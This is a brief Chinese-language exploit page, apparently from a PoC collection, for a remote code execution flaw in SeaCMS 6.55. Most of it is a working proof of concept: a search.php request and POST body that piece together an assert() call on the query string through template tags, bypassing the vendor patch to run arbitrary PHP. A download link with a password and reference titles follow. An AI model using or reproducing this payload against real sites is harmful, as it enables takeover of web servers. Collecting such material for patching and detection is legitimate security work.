跳转至

Seacms6.55远程代码执行

Affected Version 6.55

链接:https://pan.baidu.com/s/1UmbsQjQ4o4JFtK1MLHtf3g
密码:k4x1

POC

http://192.168.0.6/seacms655/search.php?phpinfo(); 
post:
searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*

References

海洋CMS(SEACMS)新版本V6.55补丁仍可被绕过执行任意代码

seacms 6.55 代码注入漏洞


最后更新: 2021-03-24